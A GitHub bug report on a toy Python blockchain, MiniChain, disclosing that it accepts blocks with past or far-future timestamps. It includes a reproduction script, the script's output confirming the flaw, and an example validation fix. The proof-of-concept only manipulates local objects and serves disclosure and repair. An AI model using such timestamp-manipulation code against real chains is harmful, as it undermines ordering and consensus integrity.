
[BUG]: Potential time-warp attack due to missing block timestamp validation #79

@Moksha25-tech


Summary

The current implementation lacks strict validation for block timestamp ordering during block acceptance in the blockchain logic.

This allows blocks with manipulated timestamps (past or far-future timestamps) to be added to the chain, potentially leading to inconsistent block ordering and incorrect chain progression.


Description

While analyzing the blockchain logic, it was observed that the system does not enforce strict timestamp validation when adding new blocks to the blockchain.

In blockchain systems, timestamps must follow monotonic progression to maintain chronological integrity and prevent manipulation of block order.

Currently:

  • Blocks can be created with arbitrary timestamps
  • No strict validation ensures:
    • new_block.timestamp > previous_block.timestamp
  • No future timestamp bound is enforced
  • Chain accepts blocks without verifying timestamp progression

This may lead to:

  • Incorrect block ordering
  • Inconsistent blockchain state
  • Time manipulation risks
  • Reduced reliability of chronological data
  • Security and consistency concerns

Affected Component

Blockchain block validation and addition logic

Possible location:

minichain/chain.py
minichain/block.py

Specifically:

add_block()
validate_block_link_and_hash()

Timestamp validation appears to be missing before appending the block to the chain.


Steps to Reproduce

1. Clone the repository

git clone https://github.com/srush/MiniChain.git
cd MiniChain

2. Create virtual environment

python3 -m venv venv
source venv/bin/activate

3. Install dependencies

pip install -r requirements.txt

4. Create reproduction script

Create a file:

reproduce_timestamp_bug.py

5. Add the following code

from minichain.chain import Blockchain
from minichain.block import Block

print("\nInitializing Blockchain...")

blockchain = Blockchain()

genesis = blockchain.last_block

print("\nGenesis Block Created")
print("Genesis Index:", genesis.index)
print("Genesis Timestamp:", genesis.timestamp)
print("Genesis Hash:", genesis.hash)

print("\n--- Current Blockchain ---")
for block in blockchain.chain:
    print(f"Index: {block.index}, Timestamp: {block.timestamp}, Hash: {block.hash}")
print("--------------------------")

print("\nCreating malicious block with PAST timestamp...")

past_block = Block(
    index=1,
    previous_hash=genesis.hash,
    transactions=[],
    timestamp=0
)

past_block.hash = past_block.compute_hash()

result1 = blockchain.add_block(past_block)

print("\nPast Block Added:", result1)
print("Past Block Timestamp:", past_block.timestamp)

print("\n--- Current Blockchain ---")
for block in blockchain.chain:
    print(f"Index: {block.index}, Timestamp: {block.timestamp}, Hash: {block.hash}")
print("--------------------------")

print("\nCreating malicious block with FUTURE timestamp...")

future_block = Block(
    index=2,
    previous_hash=past_block.hash,
    transactions=[],
    timestamp=9999999999999
)

future_block.hash = future_block.compute_hash()

result2 = blockchain.add_block(future_block)

print("\nFuture Block Added:", result2)
print("Future Block Timestamp:", future_block.timestamp)

print("\n--- Current Blockchain ---")
for block in blockchain.chain:
    print(f"Index: {block.index}, Timestamp: {block.timestamp}, Hash: {block.hash}")
print("--------------------------")

print("\nFinal Blockchain Length:", len(blockchain.chain))

if result1 and result2:
    print("\nVULNERABILITY CONFIRMED")
    print("Blockchain accepts miner-controlled timestamps")

6. Run the script

python reproduce_timestamp_bug.py

Actual Result

The blockchain accepts blocks with invalid timestamps.

(venv) moksha@LAPTOP-4EPBCM0Q:~/MiniChain$ python reproduce_timestamp_bug.py

Initializing Blockchain...

Genesis Block Created
Genesis Index: 0
Genesis Timestamp: 1774686731778
Genesis Hash: 0000000000000000000000000000000000000000000000000000000000000000

--- Current Blockchain ---
Index: 0, Timestamp: 1774686731778, Hash: 0000000000000000000000000000000000000000000000000000000000000000
--------------------------

Creating malicious block with PAST timestamp...

Past Block Added: True
Past Block Timestamp: 0

--- Current Blockchain ---
Index: 0, Timestamp: 1774686731778, Hash: 0000000000000000000000000000000000000000000000000000000000000000
Index: 1, Timestamp: 0, Hash: 3be96ee4ee6640453ad9848f871646090466398d777e5d4e035f3dec0d07cc5f
--------------------------

Creating malicious block with FUTURE timestamp...

Future Block Added: True
Future Block Timestamp: 9999999999999

--- Current Blockchain ---
Index: 0, Timestamp: 1774686731778, Hash: 0000000000000000000000000000000000000000000000000000000000000000
Index: 1, Timestamp: 0, Hash: 3be96ee4ee6640453ad9848f871646090466398d777e5d4e035f3dec0d07cc5f
Index: 2, Timestamp: 9999999999999, Hash: 2c3c2da8c193d2d0009a243628fefe1d01b7bf3bd4d38815130e7abd9087adba
--------------------------

Final Blockchain Length: 3

VULNERABILITY CONFIRMED
Blockchain accepts miner-controlled timestamps
No timestamp validation in chain.py
(venv) moksha@LAPTOP-4EPBCM0Q:~/MiniChain$ 

Both past and future timestamp blocks are accepted by the blockchain.


Expected Result

The blockchain should reject blocks with invalid timestamps.

Expected behavior:

  • Block timestamp must be greater than previous block timestamp
  • Block timestamp must follow chronological order
  • Invalid timestamp blocks should be rejected
  • Blockchain should maintain consistent block ordering

Example:

Past Block Added: False
Future Block Added: False
Final Blockchain Length: 1

Impact

Medium

  • Chronological integrity of blockchain may be affected
  • Block ordering may become inconsistent
  • Time-based manipulation becomes possible
  • Chain reliability decreases
  • Validation mechanism is incomplete

Additional Context

This issue was identified through manual testing and reproduction using a custom script.
The issue is consistently reproducible in the current implementation.
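As an added example (not MiniChain's own code), the checks that the expected behaviour above describes: strict monotonic timestamp progression plus an upper bound on future timestamps. The Block class, the add_block_checked() wrapper and the two-hour drift tolerance are assumptions; the sample blocks reuse the timestamps from the reported output.

```python
import time
from dataclasses import dataclass

# Constructed stand-in for the project's Block; field names mirror those used
# in the reproduction script (index, timestamp, previous_hash, hash).
@dataclass
class Block:
    index: int
    timestamp: int          # milliseconds since the Unix epoch, as in the report
    previous_hash: str
    hash: str

# Assumed tolerance for honest clock skew between nodes (2 hours).
MAX_FUTURE_DRIFT_MS = 2 * 60 * 60 * 1000

def validate_timestamp(new_block, previous_block, now_ms=None,
                       max_drift_ms=MAX_FUTURE_DRIFT_MS):
    """Return (ok, reason): strictly after the previous block, not beyond now + drift."""
    if now_ms is None:
        now_ms = int(time.time() * 1000)
    if not isinstance(new_block.timestamp, int) or new_block.timestamp <= 0:
        return False, "timestamp must be a positive integer"
    if new_block.timestamp <= previous_block.timestamp:
        return False, "timestamp not after previous block"
    if new_block.timestamp > now_ms + max_drift_ms:
        return False, "timestamp too far in the future"
    return True, "ok"

def add_block_checked(chain, new_block, now_ms=None):
    """Append only if the link and timestamp checks pass; returns True/False like add_block()."""
    prev = chain[-1]
    if new_block.previous_hash != prev.hash or new_block.index != prev.index + 1:
        return False
    ok, _reason = validate_timestamp(new_block, prev, now_ms)
    if not ok:
        return False
    chain.append(new_block)
    return True

def demo():
    """Replay the PAST and FUTURE cases from the report against the checked add."""
    now = 1774686731778                       # genesis timestamp from the reported output, used as "now"
    genesis = Block(0, now, "", "0" * 64)
    chain = [genesis]
    past = Block(1, 0, genesis.hash, "p" * 64)               # PAST timestamp (rejected)
    future = Block(1, 9999999999999, genesis.hash, "f" * 64) # FUTURE timestamp (rejected)
    valid = Block(1, now + 1000, genesis.hash, "v" * 64)     # one second later (accepted)
    r_past = add_block_checked(chain, past, now)
    r_future = add_block_checked(chain, future, now)
    r_valid = add_block_checked(chain, valid, now)
    return r_past, r_future, r_valid, len(chain)
```

Passing now_ms explicitly keeps the check deterministic; in production, leave it unset so the local clock is used.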
